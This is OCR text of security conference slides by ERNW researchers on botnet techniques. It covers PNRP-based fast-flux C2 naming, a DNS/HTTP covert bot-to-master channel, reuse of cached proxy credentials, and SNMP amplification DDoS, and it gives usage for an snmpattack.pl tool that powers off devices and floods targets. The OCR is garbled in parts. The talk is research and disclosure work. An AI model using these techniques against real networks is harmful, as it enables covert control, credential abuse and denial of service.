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Everything you are about to see, 
hear, read and experience is for 
educational purposes only. No 
warranties or guarantees implied or 
otherwise are in effect. Use of these 
tools, techniques and technologies 
are at your own risk. 




Who we are 
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■ Old-school network geeks. 

■ Working as security researchers for Germany based 
ERNW GmbH. 

■ Fiddling around with devices and protocols makes the 
majority of our days. 



We really like Shmoo ;-) 



Motivation 
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■ This talk is a loose collection of techniques that can 
somehow play a role in botnets. 

■ Presenting those is a bit for "pure academic research", 
but also for a better understanding of "modern distributed 
threats". 



■ And, of course, demos are always fun... 



Agenda 
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A few botnet basics 

Nearly untraceable master-bot communication 
An elegant bot2master channel 
Perform DDoS without pOwning hosts 



Conclusions 



What is a bot 
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A bot typically is some kind of malware that uses the 
compromised system for remote controlled actions like 

■ Sending spam 

■ Performing DDoS attacks 

■ Clicking banners for fun and profit 

■ Etc... 



■ There are some common phases a bot runs through 

■ Initial Infection 

■ Contact to botmaster(s) 

■ Download of payloads / instructions 
Malicious actions 



Phases of a Bot - Phase 1 
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S Initial Infection 

■ Contact to botmaster(s) 

■ Download of payloads / instructions 

■ Malicious actions 



e.g. mail attachment 
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Phases of a Bot - Phase 2 
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S Initial Infection 

S Contact to botmaster(s) 

■ Download of payloads / instructions 

■ Malicious actions 
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Phases of a Bot - Phase 3 
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S Initial Infection 

^ Contact to botmaster(s) 

S Download of payloads / instructions 

■ Malicious actions 
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Infected systems 



Phases of a Bot - Phase 4 
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S Initial Infection 

S Contact to botmaster(s) 

S Download of payloads / instructions 

S Malicious actions 




e.g DDoS attack 
against a server 



Botmaster 
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Malicious Actions 
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■ Infection of other systems (Recruiting) 
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■ Relaying of spam 
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Malicious Actions 
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Implementation of proxies for various services (e.g. 

'*L Proxy 





Proxy 

Automated clicks on (paid) advertisement banners 

AdSenseit? 
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IRC Communication 
(the traditional way) 
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What means fast flux? 
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■ There is a service (e.g. some kind of malicious website) 

■ High availability 

■ Register some name(s) with a few DNS A records 

■ The registered IP addresses are the proxying flux-bots 



Two flavors 

■ Single Flux 

Proxying services with the help of the flux-bots 

B Double Flux 

Proxying services with the help of the flux-bots 
» Even the NS records are on flux-bots 



How does fast flux work? 
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Botm aster 




Client 



Goals of Fast Flux 
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Simplified management 

1 Potentially only the botmaster has a complex setup 
1 No need to setup / hack / maintain many servers 

Additional protection layers for hiding the botmaster 



Extends the lifespan of the critical backend core server(s) 

■ The botmaster / mothership 



Enough basics 
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Now we gonna show some ideas/novel approaches how 
some of these steps could be done more efficiently. 

Nearly untraceable master-bot discovery and 
communication 

An elegant bot2master channel 



Perform DDoS without pOwning hosts 



Abuse someone's else infrastructure 
for fast flux 
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MS got a bunch of new, tricky peer to peer protocols all 
starting with Vista Windows distribution 



Some of them are dealing with the IPv6 migration 

■ Like Teredo 

Others with new link-local and P2P node discovery or 
service distribution 

■ The "Bonjour-killer" PNRP for example 



PNRP - Peer Name Resolution -p§5 &S^ 

Protocol ~^~ 

■ Distributed name resolution protocol 

■ Provides dynamic "peer name" publication and resolution 

■ _requires IPv6_ 

■ Enabled by default on WinVista (+ somehow in XP SP3) 

■ Two flavors of names 

■ Secure names -> PUBKEYHASH . NAME 

Keypair is generater on the fly (the first time only) 
■ Used for signing the registration request 

H Unsecure names -> . NAME 

m Can easily be spoofed 



PNRP 
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"PNRP is, by my definition, a truly peer-to-peer protocol. 
There is no central state server, no central registration 
server. If you publish a peer name registration globally 
through PNRP, you do not need to have a single central 
server on which to place that record." - MSDN 



No mandate for a central host. 
Companies can run own PNRP servers. 



Currently the main centralized ("internet scale") PNRP 
servers are operated by Microsoft itself. 



PNRP 
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■ It is amazingly fast to register a name. 



■ At that point fast flux ideas are coming into play. 



PNRP- fast flux 
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Bots have a shared salt. 

The botmaster uses PNRP to register an hostname. 

This hostname is a hash of: 

■ The shared salt 

■ The system-time (updated in a 10 or 15 minute window, to get around 
clock jitter and dispose of an update interval for fast-flux) 

This hostname is calculated by all drones. 

It gets resolved via PNRP. 

It disappears after the interval timeout. 



The naming logic 
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private static string GetPeerName ( ) 
{ 

string name = string. Format ( "{ 0} { 1} { 2 } { 3 } { 4} { 5} ' 

_entropy, 

DateTime .Now. Tear, 

DateTime .Now. Month, 

DateTime .Now. Day, 

DateTime .Now. Hour, 

DateTime .Now. Minute 

); 



using (SHAlCryptoServiceProvider algo = new SHAlCryptoServiceProvider () ) 
{ 

byte[] nameBytes = Encoding. UTFS . GetBytes (name) ; 

byte[] nameHash = algo . CoinputeHash (nameBytes) ; 

return Convert . ToBase64String (nameHash) ; 



The naming logic 
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Build a string based on: 

1 The entropy / shared secret of the bots and the master 
■ current date and time 

Make a hash of this string 



Register the hash as the peername 



PNRP- fast flux 
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<* 



1) Register a name: 
Ppxmgb06doj3eaz7n-v3a6fwd7beibh8iqfsa0c.p0.pnrp.net 



Botmaster 




PNRP - Demo 
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The source 
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Written in C# with .NET Framework 3.5 

■ Available for Windows Vista and Server 2008 

■ Windows XP 

■ With the P2P network packet 



■ 80 lines of code for registration 

■ 100 lines of code for resolving 

■ 70 lines of code for a simple echo service 



PNRP - future improvements 
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Extended payload 

■ Gets registered with your peer name 

■ Can fit up to 4K 

■ As your name it can get cryptographically signed 

■ Only transmitted if someone resolves your name 

_PERFECT_ approach for hidden communication 
channels within a fast-flux network. 

Can also be used to store + distribute payloads. 



-> PeerPnrpRegister() with the payload as 
PEER PNRP REGISTRATION INFO structure 



Scared ? 
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Go watch your names: 



netsh p2p pnrp cloud show names 



And look out for 'unseasonably formatted' names ;-) 



Project ET 
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Project ET 
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■ ET is the codename for an internal research project and 
environmental testing tool to build a hidden 
communication to the "outside world" 

(say, from within a company network). 

■ It can be used for elegant bot2master channel as well... 



■ ET really phones home :-) 



The goals 
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■ Get a bi-directional connection that works 

■ Trough firewalls 

■ Behind proxies 



Use the few open holes 

■ DNS lookup 

1 Dedicated HTTP proxies 



Runs on (almost) every Windows box. 



The source 
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■ Written in C# with .NET Framework 2.0. 

■ Distributed in two parts, the server and the client 
component. 



■ Not in a fully productive state, yet. 



The client 
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Has a GUI to keep the user informed about the different 
connection tests (if user should be informed ;-) 

Uses only high frequently used system calls which don't 
need special privileges (like raw sockets) 



E.g. the DNS communication only needs the 
System. Net.Dns.GetHostEntry() .NET call. 



The client 
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start DnsTest 1 start ProxyTest 




stop DnsTest 


stop Proxy Test 



"3 



DnsTest initiated. 

Found server. Starting poll thread. 

Rcvd: SLEEP 

Sleeping 5 seconds... 



d 



The server 
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■ Implements a pseudo DNS and a HTTP Server 

■ Does not implement "real" DNS and HTTP functionality 
but merely one endpoint of the communication flow. 



Includes a GUI to visualize the connected clients and 
interact like 

■ send (cmd) commands 
B collect system information 



The server 
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^jnjxj 



Start DNS listener 



Stop DN S listener | 
Log | Clients | 



[220]: 
[221]: 

[222]: 
[223]: 
[224 



KB 927802- Update 
KB 927891 -Update 
KB 928255- Update 
KB 928843- Update 



~3 



NetWork Card(s): 2 NIC(s) Installed. 

[01 ]: VMware Accelerated AMD PCNet Adapter 

Connection Name: Local Area Connection 3 

DHCP Enabled: Yes 

DHCP Server: 192.168.79.254 

IP address(es) 

[01]: 192.168.79.128 
[02]: Microsoft Loopback Adapter 

Connection Name: Local Area Connection 4 

Request: 



3 



The server 
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Start DNS listener 



Stop DNS listener | 
Log Clients 



Answers: 
ED- Old Answers 
35958 

Arrival: 9/1 6/200810: 14: 30 AM 

From: 127.0.0.1:34631 

State: 

Answers: 

Old Answers 
B- 42532 

Arrival: 9/1 6/2008 10:14:33 AM 

From: 127.0.0.1:17516 

State: 

Answers: 
[+]■■ Old Answers 



~3 



| Clear | 



The DNS channel 
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Nothing new. Everyone tunnels everything through DNS ;-) 
Still possible, even in LARGE company networks. 



Your way home is to resolve a hostname like 
DEADBEEF.test.ernw.de 

The server component needs to be registered as the name 
server for the appropriate sub domain (test.ernw.de in this 
example). 

Data is hidden in the hostname (DEADBEEF), 

The server gets your data and answers your request. 



The DNS channel 



ERNW 

Living Security. 




Standard query response, No 



> Frame 26 (83 bytes on wire, 83 bytes captured) 

> Linux cooked capture 

> Internet Protocol, Src: 80.187.51.101 (80.187.51.101), Dst : 193.254.160.1 (193.254.160.1) 

> User Datagram Protocol, Src Port: 34339 (34339), Dst Port: domain (53) 
^ Domain Name System (query) 

Transaction ID: 0x9f88 
> Flags: 0x010© (Standard query) 

Questions: 1 

Answer RRs: © 

Authority RRs: © 

Additional RRs: 
«■ Queries 

** deadbeef .test .ernw.de: type A, class IN 



Type: A (Host address) 
Class: IN (0X00O1) 



©020 cl fe a0 ©1 86 23 ©Q 35 Q© 2f 18 e7 9f 88 ©1 ©0 #.5 ./. 

0030 0© ©1 QQ ©Q SQ SO SQ S© 

©04© AM&mLWa&k :fcMoBB5EM §E~Q© 

©050 01 0© 01 



The DNS channel 
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The way back into the company network is the answer 
package of your server. 



The data is hidden in the address fields of the DNS answer 
package. 



The DNS channel 
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No.. |T ime | S0Ur ce 


Destination 


Protocol Info 


49 22.086354 80.187.51.101 


193.254.160.1 DNS Standard query A suggestquei 


> User Datagram Protocol, Src Port: domain (53), Dst 


Port: 34339 (34339) 


^ Domain Name System (response) 


[Request In: 49] 






[Time: 0.320099O00 seconds] 






Transaction ID: 0xcl33 






> Flags: 0x8180 (Standard query 


response, No error 


) 


Questions: 1 






Answer RRs: 5 






Authority RRs: 7 






Additional RRs: 7 






> Queries 






•* Answers 






> suggestqueries.google.com: t 


ype CNAME, class IN, cname suggestqueries.l .google.com 


t> suggestqueries.l .google.com: 


type A, class IN, 


addr 74.125.43.104 


> suggestqueries.l .google.com: 


type A, class IN, 


addr 74.125.43.147 


> suggestqueries.l .google.com: 


type A, class IN, 


addr 74.125.43.99 


> suggestqueries.l .google.com: 


type A, class IN, 


addr 74.125.43.103 




0000 00 00 02 O0 O0 0© 0O 0O 00 


00 00 00 00 00 08 


00 


0010 45 00 Ol 86 c4 35 40 00 f7 


11 d8 10 cl fe a0 


01 E 5(3 


0020 50 bb 33 65 00 35 86 23 01 


72 09 c4 cl 33 81 


80 P.3e.5.# .r. . .3. . 


0030 00 01 00 05 00 07 00 07 Oe 


73 75 67 67 55 73 


74 suggest 


0040 71 75 65 72 69 65 73 06 67 


6f 6f 67 6c 65 03 


63 queries, google. c 



The DNS channel 
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No. 


|Time 


| Source 


Destination 


Protocol 


| Info 




49 22.086354 


80.187.51.101 


193.254.160.1 


DNS 


Standard query A suggest que 


^^■aKEBISIsfiEE^UsEKEBBiaSBM HsISHsEBaBISIM HSUBMHsmiilillHiEI&iS u*MM*mana 


\± 





suggest queries. 1 .google.com: type A, class IN, 
Name: suggest queries. 1 .google.com 
Type: A (Host address) 
Class: IN (0x0001) 
Time to live: 1 minute, 32 seconds 
Data length: 4 


addr 


74.125.43 


.104 




suggestqueries.Lgoogle.com: type A, class IN, 
Name: suggest que ries . 1 .google.com 
Type: A (Host address) 
Class: IN (0x0001) 
Time to live: 1 minute, 32 seconds 
Data length: 4 
Addr: 74.125.43.147 


addr 


74.125.43 


.147 




suggest queries. 1 .google.com: type A, class IN, 
Name: suggest queries. 1 .google.com 
Type: A (Host address) 


add I" 


74.125.43 


.99 




0O80 


0© 04 EE 31 C0 37 00 01 00 01 00 ©0 00 


5c 


3J.7 


\ 


0090 


00 04 4a 7d 2b 93 c0 37 00 01 00 01 00 00 00 


5c 


. .J}+. .7 


\ 


00a0 


00 04 4a 7d 2b 63 c0 37 00 01 00 01 00 00 00 


5c 


. JJ+C.7 


\ 


OObO 


00 04 4a 7d 2b 67 c0 46 00 02 00 01 00 00 db 


b3 


..J} + g.F 




00C0 


00 04 01 64 c0 46 c0 46 00 02 00 01 00 O0 db 


b3 


. . .d.F.F 





The DNS channel 
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■ The code must take care of some details: 



Getting the requests in the right order 

Disallowing caching 

Don't get packets larger than 51 2B otherwise TCP will be 
used for transport (in our test-environment we actually 
found a limitation around 24B user data per request). 



The HTTP channel 
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Works almost like the DNS channel 

Request some URL like 

■ www.ernw.de/test/DEADBEEF, encode the data in the URL or 

■ www.ernw.de/test.cgi?data=DEADBEEF, encode the data in the 
parameter 

The server answer will hold the data encoded in the html- 
body 



Not yet implemented 



Find the HTTP proxy 
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Read Windows system configuration and Internet Explorer 
proxy settings. 

Get (thanks .net) an instance of Internet Explorer object 
and abuse cached proxy authentication credentials. 



Use a logged on user context to pass proxy NTLM auth. 



How to encode the data 
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We use BASE64 encoding for HTTP and BASE32 encoding 
for DNS because both are ASCII based. 



To transfer binary data we need to encode them to ASCII 
data to avoid detection by application layer inspection. 



Some problems left 
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■ Both, DNS and HTTP, are user initiated protocols 

■ On DNS you need to resolve a hostname to receive data. 

■ On HTTP you need to request a webpage to receive data. 



-> Client needs to implement some polling mechanism to 
check for data to receive. 



Project ET - Demo 
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Conclusions and outlook 
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The next step is to improve the file transfer mechanism. 

When that's done one can reflect on all sorts of evil botnet 
functions like dynamic byte code distribution and 
execution. 



Microsoft 



hotnHt 



Note: best way to detect this stuff are anomaly / statistics 
based approaches (feed Netflow data into analysis). 



Build botnets without OS compromise 
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When deployment of client (bot) component not an option. 
Potentially no need for communication infrastructure. 



■ You have to (ab-)use flawed protocols 

■ Remember SNMP ;-) 



See also: 

http://www.ernw.de/content/e7/e181/e671/download690/ER 

NW_026_SNMP_HitB_Dubai_2007_ger.pdf 



Well known SNMP vulnerabilities 
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■ Communities are transmitted in clear text 

■ Communities have well-known defaults ("public" for RO, 
"private" for RW) 

■ Protocol is UDP-based => packets may be spoofed 

■ Usually no logging of failed access attempts 

■ Corporate password change policies are rarely enforced 
with SNMP community strings ("Don't touch them, we will 
loseNWmgmt!" ;-) 



SNMPv3 
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Nobody uses v3 ("Laziness") 

v3 not fully supported by major NMS vendors (CWorks, HP-OV) 

Why? 

- V3 completely different architecture 

- Design weaknesses in v3 

- e.g. Configuration must not be visible 
=> is not displayed in "sh run" 

=> repository tools/version diffs won't work for this 



Security-wise SNMPv3 strongly recommended since many years 

■ But suffers own problems, see next slide... 



The SNMPv3 bug 



ERNW 

Living Security. 




National Cyber Alert System 

Technical Cyber Security Alert TA08-162A 



SNMPv3 Authentication Bypass Vulnerability 



Systems Affected 



■t-SIIHP 5.4,1. 5.3,2. 5.2,4. 5.1,4, and 5.0, 



-,.,_,„ -i,t| ,. t . :■ I III I?-. i- :, i-UI -U\A ■ -s I |-i 
el (RFC ; ;4 14) that incorporates security feature 
:ode (HMAC). which is calculated using a crypto* 



I i i I n ill ii III I nil- f-l-l 

ih function in combination with a secret U . ImpUn^ntstioiv: of il IMF'-.- 5 ma -alio:-. 



ERNW 
Scanning the internet, some statistics (2007)^^ Livin § Securit y 

■ Of 240.000 alive addresses... 

- -16.000 with SNMP "public" (one out of 15 !!!) 

■ - 700 with SNMP "private" (3 out of 1000) 

■ => in 350 million alive nodes approx 1.000.000 privates 

■ There are big regional differences: 
RIPE 

ARIN 

APNIC 

LACNIC 
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Findings from Operator Space —£**** security. 

dmende@ws23$ grep private results.txt | grep 
extremenetworks | wc -1 

462 

Mainly: 

■ Summit48si 

■ Alpine 3804 

dmende@ws23$ grep private results.txt | grep 
Alpine | wc -1 

83 



So here are your bots 
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Alpine 3800 



Alpine 3800 chassis switches offer total networking 
coverage, making them well suited for converged Unified 
Access networks, Metropolitan Area Networks (MANs), 
service provider and enterprise data centers, multi-tenant 
buildings and enterprise wiring closets. 

Extreme Networks© award-winning Alpine* 1 " 3800 chassis switches support the 
scalability, flexibility, security and management features required to build complete 
enterprise networks, including large campuses, branch offices, data centers and 
wiring closets. Alpine 3800 series switches enable enterprise networks to adopt new 
technologies, such as wireless and VoIP, by offering intelligent security and 
availability features to keep network convergence simple and manageable. 



> Alpine Data Sheet (L44K PDF] 

> Alpine Comparison Chart (36K PDF) 

> Alpine Product Brief (L52K PDF) 

> Alpine Visio Icons (548K ZIP) 
Products At A Glance (L.2M PDF) 




and here are even more !!! 



ERNW 

Living Security. 




(D)DoS 
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Amplification Attacks (remember "Smurf"?) 

Steps needed: 

- compile list of devices (will even be fast enough without due to UDP) 

- write some long strings to chosen places (e.g. sysContacf) 

- perform snmpbulkwalk on these places 

- spoof source address of this operation with victim's IP 

Bytes needed for "command+control" packet: approx. 60 bytes 

Bytes sent back (in some tests): up to 1500 

=> with one 2 MBit (upstream) line, 50 MBit of victim can be saturated 



Probably even much better ratios possible 
=> more research needed. 



Amplification Attack - SNMP 
Scenario: SET command 
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Victim - e.g. Router 




«*«<: 
«*&"* 



^° 



SNMP-write enabled network devices 



Amplification Attack - SNMP 
Scenario: spoofed GET request 



Spoofed with address 
of the victim 
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SNMP-write enabled network devices 
(SJ = up to 1500 bytes answer payload 



Amplification Attack - SNMP 
Scenario: flood of GET responses 
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SNMP-write enabled network devices 
(s) = 1500 bytes answer payload 



A tool for PoC: snmpattack.pl 
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age: snmpattack.pl [-Fhllrv] [ -A type] [-c comml , comm2 ] [-C tftp] [-f target] [-s type] 
[-1 delimiter] {ip/range | input file} 



-A 


type 


-c 


comm 


-C 


tftp 


-f 


target 


-F 




-h 




-I 




-1 




"P 


port 


-r 




-s 


type 


-t 


num 



Do APC specific attacks (type: 1 = allON, 3 = allOFF, 4 = allREBOOT) 

Add communities to check for (comma separated) 

Do Cisco specific attacks and specify a tftp server for config upload 

Switch to flood-mode 

Don't ask for involving flood-hosts. Start them all. 

Print this help 

Do InnoMedia specific attacks 

Parse IPs from file, seperatet with the given delimiter 

The port for tcp syn scan (default = 80) 

Test for RO / RW community 

Scans the given ip/range (type: snmp, icmp, syn | default = snmp) 

Count of parallel scans (default = 10) 

Be verbose 



scan and attack all found devices: 
# snmpattack.pl -I 10.0.0.0/24 



scan and use all founds as relay hosts: 

# snmpattack.pl -s syn -p 21 -v -f 1.2.3.4 10.0.0.0/24 

http://www.ernw.de/download/snmpattack.pl 



Summary 
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There are quite some protocols that can be used in a way probably not 
intended by their designers. 

Some of these protocols are present from the early days of the 
internet and have been designed without too much security in mind. 
You should know and understand those mechanisms. 

Many functions of traditional botnets might be performed more 

efficiently with novel approaches. 

So, again, the mitigating controls have to be adapted. 



At tomorrow's sunrise all the code shown will be available at: 
www.ernw.de/download/shmoobots.tar 



Questions? 
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I A. Mm 

H 
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and, for sure, all of you for listening to us 



Thanks for your attention! 
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